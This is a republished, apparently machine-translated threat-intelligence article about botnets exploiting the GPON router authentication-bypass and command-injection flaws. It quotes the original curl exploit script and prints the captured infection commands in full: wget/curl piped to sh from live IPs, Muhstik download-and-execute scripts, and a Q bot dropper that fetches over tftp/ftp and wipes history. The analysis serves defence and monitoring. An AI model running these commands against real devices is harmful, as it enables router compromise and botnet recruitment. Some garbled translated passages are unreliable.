Shulou(Shulou.com)06/01 Report--

This article will explain in detail how to analyze vulnerabilities in GPON Home Gateway remote command execution. The content of the article is of high quality, so the editor will share it with you for reference. I hope you will have some understanding of the relevant knowledge after reading this article.

Preface one of 0x00. Vulnerability details

The 2018 apt. 04GrampnMentor announced high-risk vulnerabilities of GPON routers: authentication bypass vulnerability (CVE-2018-10561) and command injection vulnerability (CVE-2018-10562). Since you only need to send a request to execute arbitrary commands on the GPON router, in the previous article, "GPON Home Gateway remote Command execution vulnerability Analysis", we gave an early warning about botnets.

Combined with the ZoomEye cyberspace search engine and the detailed study of the principle of the vulnerability, we conducted an in-depth study on the exploitation of the GPON Home Gateway remote command execution vulnerability, and accidentally found that the botnet exploiting this vulnerability can be monitored.

In a short period of four days, the battlefield of this router, competition, retreat, demise all the time, behind each router, there are many different malicious controllers every day, the story is unimaginable.

two。 Detection principle

The exploit script given by the vulnerability discoverer is as follows:

1 #! / bin/bash3 3 echo "[+] Sending the Command … "4 # We send the commands with two modes backtick (`) and semicolon (;) because different models trigger on different devices5 curl-k-d" XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=\ `$ 2\`; $2&ipv=0 "$1/GponForm/diag_Form?images/ 2 > / dev/null 1 > / dev/null6 echo" [+] Waiting … . "7 sleep 38 echo" [+] Retrieving the ouput... . "9 curl-k $1/diag.html?images/ 2 > / dev/null | grep" diag_result = "| sed-e" s /\ n /\ nBand g "

The logic of the script is as follows:

Step 1 (line 5): the injected command is sent to / GponForm/diag_Form and executed.

Step 2 (line 9): use the bypass vulnerability to visit the diag.html page to get the results of the command execution.

The key point is the second step:

When we do not use grep diag_result to filter the returned results, we will find that some routers will return diag_host as well. And the parameter diag_host is the command injected in step 1.

This means that through the ZoomEye cyberspace search engine, we can monitor the diag.html pages of relevant routers on the Internet to understand the activity of botnets.

Utilization of 0x01

The ZoomEye cyberspace search engine conducted three probes on 2018-05-05, 2018-05-07 and 2018-05-08, and found a total of 12 botnet-related commands.

one。 Overview of utilization

two。 Detailed introduction

1. Mirai variant botnet THANOS

This is a botnet that retreated before our research and returned during our research.

The infection commands used are as follows:

Number 1 busybox wget http://104.243.44.250/mips-O / tmp/m

No. 10 busybox wget http://82.202.166.101/mips-O-

1.1 104.243.44.250 samples

By the time we found the signs of the attack, the sample could not be downloaded. It looks like the perpetrators have retreated.

But we still know the behavior of the botnet from the samples running on the router:

Current process

Network connection

CNC 82.202.166.101 Phantom 45 Magazine 2018 Unip 05 failed to connect (the CNC was found to be reopened on 2018-05-09)

Because the malicious sample has the characteristics of generating random process name, exploding port 23 and so on, it may be Mirai botnet or its variant.

1.2 82.202.166.101 sample

# sha256sum 82.202.166.101/mips94717b25e400e142ce14305bf707dfcfe8327986fa187a2c5b32b028898a39ec 82.202.166.101/mips

In 2018-05-07, we found a small number of signs of infection in this sample, and through further research, we believe that the botnet has returned. Because the sample spreads directly on the CNC host in 1.1, the runtime will still generate random process names and burst port 23, so we classify them into the same botnet family.

New CNC

185.232.65.169:8080

The new CNC online package is as follows

According to this online packet, we call the botnet Mirai variant botnet THANOS

2. Q bot botnet variant

This is a persistent botnet that has appeared in all three of our probes. A large number of devices are expected to be infected.

The infection commands used are as follows:

No. 2 busybox wget http://185.244.25.162/mips-O / tmp/.m

Number 7 busybox wget http://58.215.144.205/mips-O / tmp/.q

Serial number 12 busybox wget http://58.215.144.205/mips-O / tmp/adj

2.1 185.244.25.162 samples

# sha256sum 185.244.25.162/mips73473c37e5590bd3eb043e33e2f8832989b88f99449582399522c63d4d46251e 185.244.25.162/mips# file 185.244.25.162/mips185.244.25.162/mips: ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped

The malicious sample belongs to MIPS architecture and is shelled with UPX. In the process of shelling and reversing it, we accidentally found the source code related to the sample: https://darknetleaks.xyz/archive/botnetfiles/Qbot%20Sources/Hacker%20serverside&clientside/client.c

However, there are still many differences between the sample and the source code:

The external scanned IP segment is different. The external scanned IP segment in the sample is as follows:

When the sample is scanned externally, it will only scan the IP in the table.

List of other bot of kill

The sample will detect the existing processes in the router and will kill if the following processes that may belong to other botnets are encountered (matching keywords are much richer than those in the source code).

The CNC of the sample is 185.33.145.92, and the CNC is still active.

It is important to note that

The sample has a built-in DDoS attack module, which can launch TCP, UDP and HTTP flood attacks according to CNC instructions.

The sample has a built-in netcore backdoor utilization module, and external scanning can be enabled through CNC (off by default. For more information on vulnerabilities, please see link: http://blog.knownsec.com/2015/01/a-brief-analysis-of-netcore-netis-leak-emergency/).

The utilization script is as follows:

Cd / tmp | | cd / var/run | | cd / mnt | | cd / root | | cd /; wget http://185.33.145.92/miggs.sh; chmod 777 miggs.sh; sh miggs.sh; tftp 185.33.145.92-c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp-r tftp2.sh-g 185.33.145.92; chmod 777 tftp2.sh; sh tftp2.sh; ftpget-v-u anonymous-p anonymous-P 21 185.33.145.92 ftp1.sh ftp1.sh Sh ftp1.sh; rm-rf miggs.sh tftp1.sh tftp2.sh ftp1.sh; rm-rf *; history-c

2.2 58.215.144.205 sample (2018-05-07 version)

# sha256sum 58.215.144.205/mips41111f0941b323c13ca84caf1e552dc78caac713f4dc1a03fc322c1febcbd6ba 58.215.144.205/mips

The infection logic of this sample does not change much, and the CNC is the same as above, which is 185.33.145.92, so we believe that this belongs to the Q bot botnet family variant.

2.3 58.215.144.205 sample (2018-05-08 version)

# sha256sum 0508/58.215.144.205/mips9590cc3c1e7a32f6221528b526212b2ad87b793b885639580c276243ec60830b 0508/58.215.144.205/mips

2018Accord05Universe 58.215.144.205Universe MIPs updated the relevant samples. Through the reverse result, the new sample is completely different from the previous logic, and the malicious controller has changed the control program.

The new sample looks more like a new variant of the Mirai botnet, and we are still following up on the details of the infection.

The CNC of the sample is linuxusaarm.com:443

3. Muhstik botnet

2018/04/20360netlab exposed a long-standing botnet: the Muhstik botnet. In this vulnerability incident, we also found a large number of Muhstik botnets.

The botnet uses the following infection commands:

Number 3 wget-qO-http://162.243.211.204/gpon|sh

Serial number 4 wget-qO-http://162.243.211.204/aio|sh

No. 5 wget-O / tmp/par http://162.243.211.204/mrt; chmod x / tmp/ping

No. 8 wget-qO-http://54.39.23.28/1sh | sh

No. 9 wget-qO-http://104.54.236.173/gpon | sh

Because of the large number of botnet samples, multiple commands have been repeatedly infected. So we use the following figure to show the relationship between each sample and each IP:

In the picture, red dots represent IP, gray dots represent infected bash scripts, yellow dots represent malicious samples, blue dots represent links that appear, and red lines represent samples downloaded from bash scripts.

The infection scripts are as follows:

# cat 104.54.236.173/gponwget-O / tmp/cron http://162.243.211.204/cron; chmod + x / tmp/cron; chmod 700 / tmp/cron; / tmp/cron & wget-O / tmp/nsshpftp http://162.243.211.204/nsshpftp; chmod + x / tmp/nsshpftp; chmod 700 / tmp/nsshpftp; / tmp/nsshpftp & # cat 162.243.211.204/gponwget-O / tmp/nsshcron http://162.243.211.204/nsshcron; chmod + x / tmp/nsshcron Chmod 700 / tmp/nsshcron; / tmp/nsshcron&wget-O / tmp/nsshpftp http://162.243.211.204/nsshpftp; chmod + x / tmp/nsshpftp; chmod 700 / tmp/nsshpftp; / tmp/nsshpftp & # cat 162.243.211.204/gponwget-O / tmp/nsshcron http://162.243.211.204/nsshcron; chmod + x / tmp/nsshcron; chmod 700 / tmp/nsshcron; / tmp/nsshcron&wget-O / tmp/nsshpftp http://162.243.211.204/nsshpftp; Chmod + x / tmp/nsshpftp; chmod 700 / tmp/nsshpftp; / tmp/nsshpftp & root@vultr:~/gpon# cat 54.39.23.28/1shwget-O / tmp/cron http://51.254.221.129/c/cron; chmod + x / tmp/cron; chmod 700 / tmp/cron; / tmp/cron & wget-O / tmp/tfti http://51.254.221.129/c/tfti; chmod + x / tmp/tfti; chmod 700 / tmp/tfti / tmp/tfti & wget-O / tmp/pftp http://51.254.221.129/c/pftp; chmod + x / tmp/pftp; chmod 700 / tmp/pftp; / tmp/pftp & wget-O / tmp/ntpd http://51.254.221.129/c/ntpd; chmod + x / tmp/ntpd; chmod 700 / tmp/ntpd; / tmp/ntpd & wget-O / tmp/sshd http://51.254.221.129/c/sshd; chmod + x / tmp/sshd; chmod 700 / tmp/sshd / tmp/sshd & wget-O / tmp/bash http://51.254.221.129/c/bash; chmod + x / tmp/bash; chmod 700 / tmp/bash; / tmp/bash & wget-O / tmp/pty http://51.254.221.129/c/pty; chmod + x / tmp/pty; chmod 700 / tmp/pty; / tmp/pty & wget-O / tmp/shy http://51.254.221.129/c/shy; chmod + x / tmp/shy; chmod 700 / tmp/shy / tmp/shy & wget-O / tmp/nsshtfti http://51.254.221.129/c/nsshtfti; chmod + x / tmp/nsshtfti; chmod 700 / tmp/nsshtfti; / tmp/nsshtfti & wget-O / tmp/nsshcron http://51.254.221.129/c/nsshcron; chmod + x / tmp/nsshcron; chmod 700 / tmp/nsshcron; / tmp/nsshcron & wget-O / tmp/nsshpftp http://51.254.221.129/c/nsshpftp; chmod + x / tmp/nsshpftp; chmod 700 / tmp/nsshpftp / tmp/nsshpftp & fetch-o / sbin/kmpathd http://51.254.221.129/c/fbsd; chmod + x / sbin/kmpathd; / sbin/kmpathd &

The sha256 values of each sample are as follows:

5f2b198701ce619c6af308bcf3cdb2ef36ad2a5a01b9d9b757de1b066070dad7 51.254.221.129/c/bashf12aa6748543fde5d3b6f882418035634d559fc4ab222d6cfb399fd659b5e34f 51.254.221.129/c/cron54b951302c8da4f9de837a0309cce034a746345d2f96a821c7fc95aa93752d43 51.254.221.129/c/fbsd2cfa79ce4059bbc5798f6856cf82af7fce1d161d6ef398c07f01a010ba5299ea 51.254.221.129/c/nsshcron3ca8c549357d6121b96256715709bccf16a249dcc45bad482f6c8123fc75642f 51.254.221.129/c/nsshpftpd4fba221b1a706dd3c617e33077d1072b37b2702c3235d342d94abfd032ba5f8 51.254.221.129/c/nsshtftie2267edd2b70b5f42a2da942fa47cca98e745f2f2ff8f3bbf7baf8b1331c1a89 51.254.221.129/c/ntpdcfc82255b7e75da9cd01cffdfd671ccf6fafaa3f705041d383149c1191d8bdff 51.254.221.129/c/pftp5e8398c89631ea8d9e776ec9bdd6348cb32a77b300ab8b4ead1860a6a1e50be7 51.254.221.129/c/pty948ef8732346e136320813aade0737540ef498945c1ea14f26a2677e4d64fdee 51.254.221.129/c/shy5477129edd21ce219e2a8ecf4c0930532c73417702215f5813c437f66c8b0299 51.254.221.129/c / sshdc937caa3b2e6cbf2cc67d02639751c320c8832047ff3b7ad5783e0fd9c2d7bae 51.254.221.129/c/tfti3138079caea0baa50978345b58b8d4b05db461b808710146d4e0abb5461c97df 162.243.211.204/aiomipsf12aa6748543fde5d3b6f882418035634d559fc4ab222d6cfb399fd659b5e34f 162.243.211.204/cron5b71ba608e417fb966ff192578d705a05eab4ff825541d9394c97271196cfd69 162.243.211.204/mrt

CNC

192.99.71.250:9090

4. Unknown sample 1

The infection commands used by the sample are as follows:

No. 6 curl-fsSL http://ztccds.freesfocss.com/test.txt | sh

# sha256sum ztccds.freesfocss.com/zt_arm24602f1c6d354e3a37d4a2e2dd9cef0098f390e1297c096997cc20da4795f2a2 ztccds.freesfocss.com/zt_arm

The sample will be connected to ztccds.freesfocss.com:23364, and the specific function of the sample is still under study.

5. Unknown sample 2

The infection commands used by the sample are as follows:

Serial number 11 busybox wget http://185.246.152.173/omni-O / tmp/talk

The command run by the sample is / tmp/talk gpon

# sha256sum 185.246.152.173/omni18c23bd57c8247db1de2413ce3ff9e61c5504c43cbadaaefce2fb59f4b3c10a0 185.246.152.173/omni

The sample will be connected to 185.246.152.173VR 1000, but the port has been shut down (2018-05-09).

0x02 affected host range

Note: since only the diag.html page has been detected, we can only determine which hosts are attacked in multiple rounds of detection, not whether the attacker is successful or not.

one。 All the detected hosts are concentrated in Mexico.

When regionalizing the detected hosts, the IP attacked in the three rounds of detection are all located in Mexico.

Sample tests were conducted on the five most affected countries, and the results are as follows:

This vulnerability exists with Mexico and Kazakhstan, but because the firmware is different, only Mexican routers return diag_host, so we only monitor Mexican routers to be affected.

Since Mexican devices account for more than half of the world's devices, we believe that the relevant data can still reflect the actual situation of botnets.

two。 Commands executed by the attacked router

Since only the content of diag_host with / tmp field is counted in the first round of detection in 2018-05-05, the data of the first round of detection has some limitations.

It is obvious that:

Confirm that the number of routers being attacked is increasing

Botnet activity is frequent. Muhstik botnet launched a large number of attacks in 2018-05-07, but it became a Q bot botnet variant in 2018-05-08. The competition between botnets is evident.

0x03 conclusion

In recent years, botnets have gradually targeted the simple but harmful vulnerabilities of the Internet of things. From last year's GoAhead to this year's GPON incident, all remind us of the importance of the security of the Internet of things. It is a harvest for us to learn about the active botnet dynamics behind the GPON events combined with the ZoomEye cyberspace search engine.

On how to carry out GPON Home Gateway remote command execution vulnerability analysis is shared here, I hope the above content can be of some help to you, can learn more knowledge. If you think the article is good, you can share it for more people to see.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.